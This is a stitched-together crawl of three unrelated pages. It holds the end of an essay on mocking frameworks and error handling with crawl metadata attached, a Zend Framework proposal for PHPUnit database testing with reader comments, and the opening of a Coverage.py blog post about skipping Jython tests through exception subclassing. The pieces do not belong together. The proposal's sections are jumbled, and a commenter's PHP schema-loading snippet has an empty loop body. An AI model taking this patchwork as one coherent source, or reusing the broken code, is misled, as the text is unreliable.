The few mocking frameworks which I’ve had the displeasure to use also have a similar misguided level of optimism when it comes to writing tests – they try really hard to hide dependencies and just make your code work, i.e. they adopt the classic ‘defensive programming’ approach which I mentioned earlier. It’s misguided because exposing your dependencies to the reader is a key part of illustrating what the reader needs to know to understand what interactions the code might rely on. If this task is onerous then that’s probably a good sign you need to do some refactoring!
I’m being overly harsh on Hello World; it’s a program intended for educational purposes not a shining example of 100% error-free code (whatever that means). I’m sure a kitten dies every time an author writes ‘error handling elided for simplicity’ but maybe that’s an unavoidable cost of trying to present a new concept in the simplest possible terms. However, when it comes to matters of correctness perhaps we need to take the difficult path if we are going to provide the most benefit in the longer term.
Reference
Matthew Wilson (2010) ‘Quality Matters #6: Exceptions for Practically-Unrecoverable Conditions’ in Overload #99, October 2010, available at: | https://accu.org/journals/overload/28/159/oldwood/ | CC-MAIN-2021-10 | refinedweb | 1,218 | 53.55 |
<ac:macro ac:<ac:plain-text-body><![CDATA[
Zend Framework: Zend_Test_PHPUnit_Database Component Proposal
Table of Contents
1. Overview
using Zend_Db to effectivly write Database related tests. This proposal
is for a subcomponent in the Zend_Test namespace that implementes the
necessary interfaces of the PHPUnit_Extensions_Database to make this tool
work with Zend_Db_Adapter_Abstract connections.
as a dataset which would make testing against Zend_Db_Table and corresponding
Zend_Db_TableRowset instances a bit more convenient.
also be integrated as additional assertions.
2. References
The PHPUnit Database Extension is very PDO centric and may hinder people
It would also allow for a very simple integration of a Zend_Db_Table implementation
Additionally the profiler does much work on counting queries and stuff, which could
3. Component Requirements, Constraints, and Acceptance Criteria
- This component MUST allow using Zend_Db_Adapter_Abstract in conjunction with PHPUnits database extension.
- This component MUST allow using Zend_Db_Table implementations as DataSets to test against.
- This component MUST add new constraints for use with the Zend_Db_Profiler
4. Dependencies on Other Framework Components
- Zend_Db_Adapter_Abstract
- Zend_Db_Table
- PHPUnit
5. Theory of Operation
Operation with this component would be exactly the same as in the current PHPUnit Database Extension.
You seed the database with a default dataset and perform operations the database as you would in normal production enviroment. At any stage you can assert weater two datasets are equal, which proves test-success.
Step by step:
1. At each testrun, PHPUnit clears the database and refills it with the Seed Data you are giving to it.
2. You perform database operations.
3. You assert that the content of two datasets are the same, where a dataset is an abstract definition of rows in a table.
Datasets come from very different sources: Flat XML format, a more complex XML format, in the next version YAML, from other database tables and from CSV-Files.
PHPUnits Database Extension puts those into a common format and allows them to be comparable so that you can check for example weater the contents of a database table equal the contents in a given XML file after you performed some operations in the test-case.
6. Milestones / Tasks
- Milestone 1: Proposal, Community Review and Acceptance
- Milestone 2: Unit-Testing and Development
- Milestone 3: Documentation and Testing
7. Class Index
- Zend_Test_PHPUnit_DatabaseTestCase
- Zend_Test_PHPUnit_Database_Connection
- Zend_Test_PHPUnit_Database_DataSet_ZendDbTable
- Zend_Test_PHPUnit_Database_DataSet_RowSet
- Zend_Test_PHPUnit_Database_Metadata_Generic
- Zend_Test_PHPUnit_Database_Operation_*
6 Commentscomments.show.hide
Feb 05, 2009
Ralph Schindler
<p>Can you talk about where (in the current project structure) database fixtures (and other testing data) would go?</p>
<p>Does this mean that the schema needs to be defined somewhere so that a full build up and breakdown can be used? If this is the case, where does the schema go in the project structure?</p>
<p>I think we need to start discussing how we are gonna manage the tearing up and breaking down of a projects sql ddl and dml files.</p>
Feb 05, 2009
Benjamin Eberlei
<p>PHPUnit Database extension takes the Schema as a given. It has to be able to accept the seed-data as input. Therefore you it has to be installed on the database beforehand.</p>
Feb 06, 2009
bullfrogblues
<ac:macro ac:<ac:plain-text-body><![CDATA[i agree, currently i use the following which takes an sql file. The table is dropped if it exists, which i don't like and should change.
DbTestsHelperMethod
protected function _loadDbSchema()
{
$schemaFile = Zend_Registry::get('testDbSchemaPath');
$schema = file_get_contents($schemaFile);
$statements = explode(';', $schema);
$db = $this->_db;
$conn = $db->getConnection();
$filter = new Zend_Filter_StringTrim();
foreach ($statements as $statement)
}
SQL
–
-- Table structure for table `name`
–
DROP TABLE IF EXISTS `name`;
CREATE TABLE IF NOT EXISTS `name` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(255) collate utf8_unicode_ci NOT NULL,
`date_created` date default NULL,
PRIMARY KEY (`id`)
) ENGINE=INNODB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
I place my test db schema file in the application config folder and register it in my testHelper to "testDbSchemaPath" and simply call it when needed:
$schemaFile = Zend_Registry::get('testDbSchemaPath');
I think this is better because it doesn't matter where it is.
That said there could be a default, maybe a _files/schema folder below the actual Class?
so,
$path = realpath(dirname(_FILE_) . '/../')) . '/_files/schema;
$sql = $path . '/db-schema.sql
$xml = $path . '/db-schema.xml
]]></ac:plain-text-body></ac:macro>
Feb 26, 2009
Matthew Weier O'Phinney
<p>Ben, there was some talk at one point about pushing the DBUnit provider and assertions into classes that could be consumed from within a generic PHPUnit_Framework_TestCase. Can you verify if this has been done? if so, would this proposal target such an approach?</p>
<p>The reason I ask is that, for the larger goal of functional testing, it would be handy to have the ability to grab a DB provider, do your seeding, and then do assertions against the DB following an operation. Right now, the way your proposal stands, you would not be able to do that as the DBUnit integration uses its own specialized test case.</p>
Feb 26, 2009
Benjamin Eberlei
<p>the testcase is jsut for convenience, it only consists of methods that proxy to classes to make it easier to work with. Its perfectly possible to do seeding from any testcase base class, if you know how to do it.</p>
<p>this is a good point, which needs documentation and i will make sure to write a bigger example part on the cases where you cannot work with the DatabaseTestCase class.</p>
Mar 27, 2009
Matthew Weier O'Phinney
<ac:macro ac:<ac:parameter ac:Zend Acceptance</ac:parameter><ac:rich-text-body>
<p>This proposal is accepted for immediate development in the standard incubator, with one minor change:</p>
<ul>
<li>Zend_Test_PHPUnit_Database_ namespace to be renamed to Zend_Test_PHPUnit_Db (for consistency with the Zend_Db namespace)</li>
</ul>
</ac:rich-text-body></ac:macro> | http://framework.zend.com/wiki/display/ZFPROP/Zend_Test_PHPUnit_Database+-+Benjamin+Eberlei?focusedCommentId=9437767 | CC-MAIN-2014-10 | refinedweb | 960 | 51.68 |
26 September 2012 10:56 [Source: ICIS news]
SINGAPORE (ICIS)--?xml:namespace>
The data also showed that 74.7% and 12.5% of imports arrived in
Meanwhile, the average toluene import prices in August were at $1,103/tonne (€849/tonne) CFR (cost and freight) China, down by around $18/tonne from July, according to the data.
The import prices were higher than domestic prices in early August, with the price spread at yuan (CNY) 150-250/tonne ($24-40/tonne), importers said.
The average domestic prices for August were assessed at CNY8,480/tonne ex-tank Zhangjiagang, according to Chemease, an ICIS service in
($1 = €0 | http://www.icis.com/Articles/2012/09/26/9598629/chinas-toluene-imports-fall-by-11-in-august-on-weak-demand.html | CC-MAIN-2015-22 | refinedweb | 107 | 64.51 |
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video.
Creating Custom Routes15:05 with Jim Hoskins
Devise created several routes for registering and signing in and out, but we can create our own routes to design what our URLs will look like to the world.
- 0:00
[Jim Hoskins]: When we set up Devise, it created several routes
- 0:02
or URLs for things like signing up and logging in.
- 0:05
We could actually customize these URLs
- 0:07
by updating a special config file
- 0:09
called our "routes.rb" file.
- 0:12
So, now we've got our alerts all set up,
- 0:14
but there are a couple more things that I want to work on.
- 0:16
If we click on Register right here,
- 0:18
we get our Register page,
- 0:20
but the URL for it is /users/sign_up,
- 0:24
and it would be nice if it was just something like
- 0:27
- 0:29
So, how do we go about doing this?
- 0:31
Well, we want to start modifying our routes.
- 0:34
Now, our routes are what map our URLs
- 0:37
to the actual controller actions
- 0:39
and pages that we see.
- 0:41
So, for instance, if we go to /statuses,
- 0:43
we get all of our statuses.
- 0:45
In fact, if we go to the root, we also get all of our statuses.
- 0:48
This is managed in a special file in the Config directory,
- 0:52
not the App directory.
- 0:54
So, if we open up Config, we'll see a file called "routes.rb,"
- 0:58
and there's already some code in it.
- 1:00
Everything between lines 7 and down here to line 62
- 1:05
is all documentation.
- 1:07
The # right here defines a comment,
- 1:09
which means it's not code that's interpreted.
- 1:11
Instead, it's for us to read.
- 1:14
So, we could remove this entirely,
- 1:16
but Rails provides us with a lot of comments in here
- 1:18
so we can understand how the routes work.
- 1:21
If we take a look at what's in it right now,
- 1:23
we have different rules
- 1:25
and these rules are tried to match in order
- 1:28
every time we get a request to find out where it should actually be handled.
- 1:31
So, for instance,
- 1:33
there's actually a special helper here
- 1:35
from Devise called "devise_for :users"
- 1:37
and this sets up quite a few of the routes.
- 1:41
You'll remember we saw our routes when we did
- 1:43
our rake routes.
- 1:45
We can type it in here, rake routes,
- 1:47
and what rake routes actually does
- 1:50
is take a look at our routes file
- 1:52
and figure out what goes where.
- 1:55
So, that devise_for :users is responsible
- 1:57
for all of these routes.
- 1:59
Our user_session routes for logging in and out,
- 2:01
our user_password routes for modifying our password,
- 2:03
and our registration paths.
- 2:06
You can see that they're all namespaced under /users here.
- 2:09
We can modify these, but it's best for us to take a look
- 2:12
at the Devise documentation,
- 2:18
because there are some helpers in play,
- 2:20
there are some specific rules for how we create
- 2:23
our specific Devise routes.
- 2:25
So, for instance, we can take a look at our documentation,
- 2:27
we can search for routes to find exactly where it is,
- 2:34
and we can find the Configuring Routes section.
- 2:37
Now, there are a couple of different examples here.
- 2:40
This first example explains if we wanted to just change the second part of our route.
- 2:44
Let's start up our Rails server again.
- 2:50
You can see that our routes are separated by /users
- 2:53
and /sign_up.
- 2:55
So, if we wanted to just change sign_up to users/register,
- 2:58
we could use this first example from the documentation.
- 3:00
For instance, adding path_names for our devise_for call
- 3:04
and changing our registration
- 3:06
to 'register' as well as any of the other routes.
- 3:10
Now, I'm fine with the
- 3:12
existing routes and how they are.
- 3:14
We don't really need to change them.
- 3:16
In fact, what I'd like to do is have a simple URL
- 3:18
at the top level where it's just going to be
- 3:21
- 3:25
We'll just call this a custom route.
- 3:27
I'm going to leave everything else in place,
- 3:29
but places where I want to link to /register
- 3:32
will have a new route that also points to this exact same page.
- 3:36
So, we can do that
- 3:38
by going into our routes.rb
- 3:40
and following the example in our documentation.
- 3:42
So, it says we want to wrap it
- 3:44
in a devise_scope block.
- 3:47
Now, Devise is nice because it allows us to have
- 3:49
multiple ways of logging in.
- 3:51
This is why we see our scope of user
- 3:53
in both our URL and our routes.
- 3:55
Later on, we could create another way of logging in
- 3:57
for a model called, let's say, "Admins,"
- 4:00
and that would be 2 completely distinct authentication systems.
- 4:03
One for users, and one for admins,
- 4:05
and Devise allows us to namespace it.
- 4:08
So, that's why we see users everywhere,
- 4:10
including in our URLs.
- 4:12
Right now, we really only have 1 way of logging in,
- 4:15
and that's through the user,
- 4:17
but we'll still use the devise_scope :user right here.
- 4:20
So, we'll go to our routes,
- 4:22
and I'm going to add this beneath our devise_for :users,
- 4:25
because it's slightly lower priority.
- 4:27
You can go to devise_scope block,
- 4:32
and it's going to be :user, and we'll open up our block with a 'do'
- 4:37
and close it with an 'end.'
- 4:39
Now, any route we define inside of this block
- 4:41
will be properly scoped to the user model.
- 4:45
We can see an example here.
- 4:47
What we want to do is we want to match
- 4:49
our register.
- 4:52
What we say when we do this is,
- 4:54
this is 'get' and this means anytime we get a get request
- 4:58
to /register, we want this route to match.
- 5:02
Now, we have to pass some options.
- 5:04
When we see a get request to register what do we want to do?
- 5:08
We want to use the 'to:' option,
- 5:10
and that is 'to:'
- 5:12
and then we pass it the string.
- 5:15
This is a string that we can see an example of here.
- 5:18
It's a name of our controller and the name of an action,
- 5:23
separated by #.
- 5:26
So, what do we want to do?
- 5:28
Well, in this example we're can see it's:
- 5:30
devise/sessions#new.
- 5:34
For us it should be:
- 5:36
devise/registrations#new.
- 5:43
So, let's see if that works.
- 5:45
Everything should be running, so if we go to /register now--
- 5:48
I refreshed, and it worked.
- 5:51
If we go to register, we can see it works.
- 5:53
We can make sure that it wasn't just a fluke
- 5:55
if we go to a misspelled name,
- 5:57
we see we get a routing error.
- 5:59
If we go and click the Register button,
- 6:01
we can see it's still available
- 6:03
ast /users/sign_up,
- 6:05
but I would like to use /register.
- 6:09
Now, by adding this to routes all we've done is another URL
- 6:11
that it recognizes for that page.
- 6:14
It has not changed what we actually link to,
- 6:16
and that's our responsibility.
- 6:18
We could go into our views and change our links
- 6:21
to link to /register,
- 6:23
however, we've seen how using our named routes
- 6:26
are very helpful.
- 6:28
So, what we want to do is add a named route,
- 6:30
and we give this a name by passing another option--
- 6:33
as:
- 6:35
and we can just type in a name as the symbol,
- 6:37
and we can see how this works with rake routes once again.
- 6:41
I've saved it, and if we do rake routes,
- 6:44
we can see we now have
- 6:46
this new register name here,
- 6:50
which means we'll be able to use the helper register_path
- 6:54
or register_URL,
- 6:56
and it'll link to /register.
- 6:59
So, that name allows us to use a named helper
- 7:01
inside of our Views.
- 7:03
So, let's start up the Rails server
- 7:05
and go into our Views,
- 7:07
application.html.erb
- 7:10
and find that link.
- 7:14
Here we can see the new_user_registration_path
- 7:17
which we can replace with the
- 7:19
register_path.
- 7:21
We save it out, we go back, and we refresh.
- 7:25
If we hover over this, we should see it now links to /register,
- 7:28
and it goes exactly where we want.
- 7:31
The process is the same for logging in.
- 7:35
We, again, have this /users/sign_in,
- 7:38
but we want to go to a different page.
- 7:40
We can do pretty much the same thing
- 7:42
by opening up our routes again,
- 7:45
and we can, for the most part, copy and paste.
- 7:48
I now want it to be login,
- 7:52
and we can change this.
- 7:55
Now it's not a new registration that we're going to
- 7:57
it's actually a session.
- 8:00
Our controller is devise/sessions
- 8:03
because when we log in we're creating
- 8:05
a new session,
- 8:07
and the #new action is still correct.
- 8:09
We also have to change the name.
- 8:12
So, we'll change this to login.
- 8:14
We can save it.
- 8:17
If we refresh
- 8:21
and go to /login,
- 8:24
we get our Sign In page.
- 8:26
We probably do want to define
- 8:28
whether or not we want to call it "Log In" or "Sign In,"
- 8:30
but right now I'm going to keep it inconsistent, and I will discuss it with Jason
- 8:33
and figure out exactly what we want.
- 8:35
The process is the same for changing the link,
- 8:37
so we'll just go into our application--
- 8:39
application.html.erb,
- 8:45
and what did we name that? We named it login.
- 8:47
Now we'll replace this with login_path,
- 8:52
and if we go to log in, it works.
- 8:55
Now, let's actually log in by typing in
- 8:57
my email address and my password
- 9:00
and signing in.
- 9:04
One thing we have here is our user/sign_out,
- 9:06
and we'll remember that this has to be a special delete request
- 9:10
to user/sign_out.
- 9:12
If we go to /users/sign_out
- 9:17
as a get request by simply typing it into our address bar,
- 9:20
it doesn't actually log us out.
- 9:23
We can actually go back
- 9:25
and see that we're logged in.
- 9:27
You can argue that not allowing a get request
- 9:29
for logging out makes it safer,
- 9:31
but what if we really do want to type logout?
- 9:35
We can do that because we can create our own
- 9:38
route that will go to the proper action.
- 9:41
So, the method is pretty much the same.
- 9:44
We can copy this line again,
- 9:47
[typing]
- 9:49
and it's, of course, going to be logout,
- 9:52
but instead of going to our sessions#new page,
- 9:54
we'll go to our sessions#destroy action,
- 9:57
and this is what actually logs us out.
- 9:59
We'll rename is so we can use it in our views,
- 10:01
and now that we have it saved
- 10:03
if we refresh our logout page here by going to it,
- 10:06
you'll see it actually took us,
- 10:09
signed us out, and we are now logged out.
- 10:11
You can see we now added a get path
- 10:13
that allows us to log out.
- 10:15
[typing]
- 10:19
Now, all we need to do is add it to our
- 10:21
application.html.erb.
- 10:23
We can replace destroy_user_session_path with
- 10:26
logout_path,
- 10:28
and we don't need this method: :delete.
- 10:31
In fact, it will make it not work
- 10:33
because our logout_path accepts get requests.
- 10:36
Now, if we refresh, we can test out our Log Out button,
- 10:39
and it works.
- 10:42
Everything works just as we like it.
- 10:45
We can continue this along with our edit_user_registration_path
- 10:48
and our other paths,
- 10:51
but let's take a look at a couple more things we can do
- 10:53
with routing.
- 10:55
Right now, our root path is displaying all of our statuses
- 10:58
and this is our statuses controller
- 11:00
index action.
- 11:03
If we click on All Statuses, here, we can see
- 11:05
/statuses and this is a default route that's built in
- 11:08
when we created our statuses controller.
- 11:11
If we take a look at Routes and see how that works,
- 11:13
we can see on line 11 here we have another special method called,
- 11:16
"Resources,"
- 11:18
and if we take a look at the rake routes,
- 11:20
to see what's created.
- 11:22
[typing]
- 11:24
That resources call is responsible
- 11:26
for everything under /statuses here,
- 11:29
and this allows us a nice, uniform way
- 11:32
in Rails of addressing the different actions.
- 11:35
/statuses will map to Index.
- 11:39
When we post to /statuses, like when we create our form,
- 11:42
it posts to /statuses, which is our Create action.
- 11:45
/status/new is our new page,
- 11:48
and our /id/edit is our #edit, #show, #update, and #destroy.
- 11:53
Finally, we see our root which was defined on line 12.
- 11:57
Root is a special URL which is
- 12:00
when we have nothing in our path,
- 12:02
and it defines where it should go.
- 12:04
This goes to our statuses#index.
- 12:07
What if we wanted, for instance,
- 12:09
to say when we go to /feed?
- 12:12
We would want it to display
- 12:14
all of our statuses.
- 12:16
Well, let's start up our Rails to see exactly what the error would be.
- 12:20
I'm going to reload /feed here,
- 12:22
and we get "no route matches."
- 12:25
We can do this pretty easily.
- 12:27
We want a get request to feed
- 12:30
to go to:
- 12:34
and we want it to be statuses#index for the index action,
- 12:40
and we'll call it, "as: :feed"
- 12:47
So, we can see how we can create our URLs.
- 12:49
It looks like I have an issue here.
- 12:51
Looks like I misspelled status by adding an extra S where it wasn't needed.
- 12:56
We can see that error right there.
- 12:58
It's a Routing Error and you can see by
- 13:00
simply taking the incorrect name here
- 13:03
it tried to create a "statsus" controller.
- 13:06
That tells us that we had an error
- 13:08
because we don't have a "statsus."
- 13:10
By simply fixing it,
- 13:12
by removing that extra S
- 13:14
and refreshing,
- 13:17
we realize that we actually do have to have it
- 13:19
be pluralized.
- 13:22
Those are the common errors you get when trying to create a new route.
- 13:25
Now /feed takes us to the same page
- 13:27
that /statuses would.
- 13:29
Now, if we wanted to link to that
- 13:31
of course we can go to our application here
- 13:34
instead of having our statuses_path we could have our
- 13:36
feed_path.
- 13:39
Now if we refresh, click on All Statuses,
- 13:42
it will now link us to /feed.
- 13:45
That's the basics of modifying our Routes file.
- 13:48
The get command takes a path that we want to match,
- 13:51
and we can tell it where to route to
- 13:54
with the "to:" option.
- 13:56
We can also give it a name that we can use as a named route
- 13:58
inside of our Views
- 14:00
by passing the as option
- 14:02
and the name of our route.
- 14:04
We use a special devise_scope :user
- 14:06
to correctly route based on the correct scope
- 14:10
devise_for the routes
- 14:12
that actually have to do with our Devise authentication.
- 14:15
I think we got a lot of our URLs that we want to work with right now
- 14:19
set up exactly how we want,
- 14:21
so we're at another good point.
- 14:23
We'll stop our server,
- 14:25
we'll check our status by typing "git status"
- 14:27
[typing]
- 14:29
We've modified our layout and our routes, that looks correct,
- 14:32
so we'll do git add,
- 14:34
git commit,
- 14:36
and our message is,
- 14:38
"Added custom routes for auth and feed."
- 14:45
I think that's all I want to do so before I do a push,
- 14:48
I'm going to do a git pull to make sure that there's no new code
- 14:50
from Jason. Looks like I'm good.
- 14:52
So, I can just do a
- 14:54
git push origin master,
- 14:58
and we've updated our routes code.
- 15:00
It's all pushed up to Jason,
- 15:02
and now we can continue working on our code. | https://teamtreehouse.com/library/build-a-simple-ruby-on-rails-application/designing-urls/creating-custom-routes | CC-MAIN-2017-13 | refinedweb | 3,247 | 76.96 |
Number of elements in vector
I want to implement the Gauss-Seidel method for solving linear systems for a university project, and I'm stuck on how to get the number of elements in the product vector
b = A * x. Here's my code:
def Gauss_Seidel(m, v, initial): n = v.size() <--------- prev = vector(RR, n) nex = vector(RR, n) prev = initial while abs(inf_vector_norm(nex) - inf_vector_norm(nex)) > 0.1: for i in xrange(n): s1 = sum(m[i,j] * nex[j] for j in xrange(i)) s2 = sum(m[i,j] * prev[j] for j in xrange(j+1, n+1)) nex[i] = (v[i] - s1 - s2) / m[i,i] return nex
In the code, 'm' is the input matrix, 'v' is the product of the matrix and our variable vector, and 'initial' is the starting guess for Gauss-Seidel's Method. The line pointed by that arrow is the one I'm interested in, and it's showing what I want to accomplish. I searched for it on Sage textbooks, but they are oddly silent on the matter of vectors. Any ideas? Also any other recommendations and advice on my code is more than welcome. | https://ask.sagemath.org/question/44982/number-of-elements-in-vector/ | CC-MAIN-2019-35 | refinedweb | 197 | 64.44 |
This tutorial will show you how to create and use
GateString objects, which represent an ordered sequence (or "string") of quantum gate operations. In almost all cases, you'll be using a list (or even a list of lists!) of
GateStrings, so we'll often be talking about "gate string lists". You may have noticed in Tutorial 00 that we had to generate gate string lists of "fiducials" and "germs" in order to populate the data template file which GST analyzes to produce its estimates.
A
GateString object is nearly identical, and sometimes interchangeable, with a Python tuple of gate labels (i.e. the names beginning with
G that label the gate operations in a
GateSet). They can be accessed via
.tup and
.str. The outcomes of an experiment correspond to different SPAM labels (c.f. the gate set tutorial), and so by repeating an experiment one obtains counts and thereby frequencies for each SPAM label. Given a
GateSet one can obtain corresponding probabilities by muliplying gate matrices and contracting the product between the state preparation and POVM effect vectors associated with each SPAM label. #Create spam specs which is just a tuple of two lists SpamSpec objects: one list # for preparation, the other for measurment. Each SpamSpec object associates a # fiducial gate string with a state prep (for preparation fiducials) # or a POVM effect (for measurement fiducials). In this example, since we're # just interested in the LGST strings, the state preps and POVM effects do not # enter and are irrelevant. mySpecs = pc.build_spam_specs(fiducialGateStrings=myFiducialList) lgstStrings = pc.list_lgst_gatestrings(mySpecs
As a final full-fledged example we demonstrate functions which generate gate string lists for running extended LGST (eLGST or EXLGST) and long-sequence GST (LSGST) from lists of gates, fiducials, germs, and maximum lengths. eLGST and LSGST are two different algorithms for performing Gate Set Tomography (more detail will be given on these in the Algorithms tutorial). The important different between the two for our purposes is that eLGST does not include fiducial-string prefixes or postfixes in its lists whereas LSGST does. The following example functions are very similar to
pygsti.construction.make_lsgst_lists,
pygsti.construction.make_elgst_lists, and can be copied verbatim then modified in many circumstances to provide customized gate string generation.
Both functions product a list of lists of
GateString objects. As we'll see in later tutorials, eLGST and LSGST Gate Set Tomography algorithms utilize an iterative approach whereby longer and longer gate strings are used in each successive iteration. Each list in the list-of-lists returned by these functions specifies the gate sequences to use during the corresponding iteration. Thus, each successive list contains longer gate strings. Each list is generated using a maximum length, and the list of maximum lengths,
maxLengthList below, specifies the maximum length of each list in the lists-of-lists. Thus,
maxLengthList should be an increasing list of integers (in practice, increasing by powers of two seems good) and the length of
maxLengthList determines the length of the returned list-of-lists, i.e. the number of gate string lists.
def make_ls) lsgst_list = pc.gatestring_list([ () ]) #running list of all strings so far if maxLengthList[0] == 0: lsgst_listOfLists = [ lgstStrings ] maxLengthList = maxLengthList[1:] else: lsgst_listOfLists = [ ] for maxLen in maxLengthList: lsgst_list += pc.create_gatestring_list("f0+R(germ,N)+f1", f0=fiducialList, f1=fiducialList, germ=germList, N=maxLen, R=pc.repeat_with_max_length, order=('germ','f0','f1')) lsgst_listOfLists.append( pygsti.remove_duplicates(lgstStrings + lsgst_list) ) print("%d LSGST sets w/lengths" % len(lsgst_listOfLists), map(len,lsgst_listOfLists)) return lsgst_listOfLists def make_el) elgst_list = pc.gatestring_list([ () ]) #running list of all strings so far if maxLengthList[0] == 0: elgst_listOfLists = [ singleGates ] maxLengthList = maxLengthList[1:] else: elgst_listOfLists = [ ] for maxLen in maxLengthList: elgst_list += pc.create_gatestring_list("R(germ,N)", germ=germList, N=maxLen, R=pc.repeat_with_max_length) elgst_listOfLists.append( pygsti.remove_duplicates(singleGates + elgst_list) ) print("%d eLGST sets w/lengths" % len(elgst_listOfLists),map(len,elgst_listOfLists)) return elgst_listOfLists
We'll now use these functions to generate some lists we'll use in other tutorials. To do this, we'll use
pygsti.io.write_gatestring_list to write the lists to text files with one gate string (in it's string representation) per line.
gates = ['Gi','Gx','Gy'] fiducials = pc.gatestring_list([ (), ('Gx',), ('Gy',), ('Gx','Gx'), ('Gx','Gx','Gx'), ('Gy','Gy','Gy') ]) # fiducials for 1Q MUB germs = pc.gatestring_list( [('Gx',), ('Gy',), ('Gi',), ('Gx', 'Gy',), ('Gx', 'Gy', 'Gi',), ('Gx', 'Gi', 'Gy',),('Gx', 'Gi', 'Gi',), ('Gy', 'Gi', 'Gi',), ('Gx', 'Gx', 'Gi', 'Gy',), ('Gx', 'Gy', 'Gy', 'Gi',), ('Gx', 'Gx', 'Gy', 'Gx', 'Gy', 'Gy',)] ) maxLengths = [0,1,2,4,8,16,32,64,128,256] elgst_lists = make_elgst_lists(gates, fiducials, germs, maxLengths) lsgst_lists = make_lsgst_lists(gates, fiducials, germs, maxLengths) print("\nFirst 20 items for dataset generation in label : string format") for gateString in lsgst_lists[-1][0:30]: print(str(gateString).ljust(20), ": ", tuple(gateString))
10 eLGST sets w/lengths <map object at 0x10a2329e8> 10 LSGST sets w/lengths <map object at 0x10a262f98> First 20 items for dataset generation in label : string format {} : () Gx : ('Gx',) Gy : ('Gy',) GxGx : ('Gx', 'Gx') GxGxGx : ('Gx', 'Gx', 'Gx') GyGyGy : ('Gy', 'Gy', 'Gy') GxGy : ('Gx', 'Gy') GxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx') GxGyGyGy : ('Gx', 'Gy', 'Gy', 'Gy') GyGx : ('Gy', 'Gx') GyGy : ('Gy', 'Gy') GyGxGx : ('Gy', 'Gx', 'Gx') GyGxGxGx : ('Gy', 'Gx', 'Gx', 'Gx') GyGyGyGy : ('Gy', 'Gy', 'Gy', 'Gy') GxGxGy : ('Gx', 'Gx', 'Gy') GxGxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx', 'Gx') GxGxGyGyGy : ('Gx', 'Gx', 'Gy', 'Gy', 'Gy') GxGxGxGy : ('Gx', 'Gx', 'Gx', 'Gy') GxGxGxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx', 'Gx', 'Gx') GxGxGxGyGyGy : ('Gx', 'Gx', 'Gx', 'Gy', 'Gy', 'Gy') GyGyGyGx : ('Gy', 'Gy', 'Gy', 'Gx') GyGyGyGxGx : ('Gy', 'Gy', 'Gy', 'Gx', 'Gx') GyGyGyGxGxGx : ('Gy', 'Gy', 'Gy', 'Gx', 'Gx', 'Gx') GyGyGyGyGyGy : ('Gy', 'Gy', 'Gy', 'Gy', 'Gy', 'Gy') (Gi) : ('Gi',) (Gi)Gx : ('Gi', 'Gx') (Gi)Gy : ('Gi', 'Gy') (Gi)GxGx : ('Gi', 'Gx', 'Gx') (Gi)GxGxGx : ('Gi', 'Gx', 'Gx', 'Gx') (Gi)GyGyGy : ('Gi', 'Gy', 'Gy', 'Gy')
#Write example gatestring list files for later use pygsti.io.write_gatestring_list("tutorial_files/Example_FiducialList.txt", fiducials,"#My fiducial strings") pygsti.io.write_gatestring_list("tutorial_files/Example_GermsList.txt", germs,"#My germ strings") pygsti.io.write_gatestring_list("tutorial_files/Example_GatestringList.txt",lsgst_lists[-1],"#All the gate strings to be in my dataset") pygsti.io.write_empty_dataset("tutorial_files/Example_DatasetTemplate.txt",lsgst_lists[-1]) for l,lst in zip(maxLengths,elgst_lists): pygsti.io.write_gatestring_list("tutorial_files/Example_eLGSTlist%d.txt" % l,lst, "# eLGST gate strings for max length %d" % l) for l,lst in zip(maxLengths,lsgst_lists): pygsti.io.write_gatestring_list("tutorial_files/Example_LSGSTlist%d.txt" % l,lst, "# LSGST gate strings for max length %d" % l) #Also write the max lengths we used to file import json json.dump(maxLengths, open("tutorial_files/Example_maxLengths.json","w")) | https://nbviewer.jupyter.org/github/pyGSTio/pyGSTi/blob/v0.9.3/jupyter_notebooks/Tutorials/02%20Gatestring%20lists.ipynb | CC-MAIN-2021-39 | refinedweb | 1,069 | 51.58 |
Sunday 22 January 2017
It was the best of times, it was the worst of times...
This week saw the release of three different versions of Coverage.py. This is not what I intended. Clearly something was getting tangled up. It had to do with some tricky exception handling. The story is kind of long and intricate, but has a number of chewy nuggets that fascinate me. Your mileage may vary.
Writing it all out, many of these missteps seem obvious and stupid. If you take nothing else from this, know that everyone makes mistakes, and we are all still trying to figure out the best way to solve some problems.
It started because I wanted to get the test suite running well on Jython. Jython is hard to support in Coverage.py: it can do “coverage run”, but because it doesn’t have the same internals as CPython, it can’t do “coverage report” or any of the other reporting code. Internally, there’s one place in the common reporting code where we detect this, and raise an exception. Before all the changes I’m about to describe, that code looked like this:
for attr in ['co_lnotab', 'co_firstlineno']:
if not hasattr(self.code, attr):
raise CoverageException(
"This implementation of Python doesn't support code analysis.\n"
"Run coverage.py under CPython for this command."
)
The CoverageException class is derived from Exception. Inside of Coverage.py, all exceptions raised are derived from CoverageException. This is a good practice for any library. For the coverage command-line tool, it means we can catch CoverageException at the top of main() so that we can print the message without an ugly traceback from the internals of Coverage.py.
The problem with running the test suite under Jython is that this “can’t support code analysis” exception was being raised from hundreds of tests. I wanted to get to zero failures or errors, either by making the tests pass (where the operations were supported on Jython) or skipping the tests (where the operations were unsupported).
There are lots of tests in the Coverage.py test suite that are skipped for all sorts of reasons. But I didn’t want to add decorators or conditionals to hundreds of tests for the Jython case. First, it would be a lot of noise in the tests. Second, it’s not always immediately clear from a test that it is going to touch the analysis code. Lastly and most importantly, if someday in the future I figured out how to do analysis on Jython, or if it grew the features to make the current code work, I didn’t want to have to then remove all that test-skipping noise.
So I wanted to somehow automatically skip tests when this particular exception was raised. The unittest module already has a way to do this: tests are skipped by raising a unittest.SkipTest exception. If the exception raised for “can’t support code analysis” derived from SkipTest, then the tests would be skipped automatically. Genius idea!
So in 4.3.2, the code changed to this (spread across a few files):
from coverage.backunittest import unittest
class StopEverything(unittest.SkipTest):
"""An exception that means everything should stop.
This derives from SkipTest so that tests that spring this trap will be
skipped automatically, without a lot of boilerplate all over the place.
"""
pass
class IncapablePython(CoverageException, StopEverything):
"""An operation is attempted that this version of Python cannot do."""
pass
...
# Alternative Python implementations don't always provide all the
# attributes on code objects that we need to do the analysis.
for attr in ['co_lnotab', 'co_firstlineno']:
if not hasattr(self.code, attr):
raise IncapablePython(
"This implementation of Python doesn't support code analysis.\n"
"Run coverage.py under another Python for this command."
)
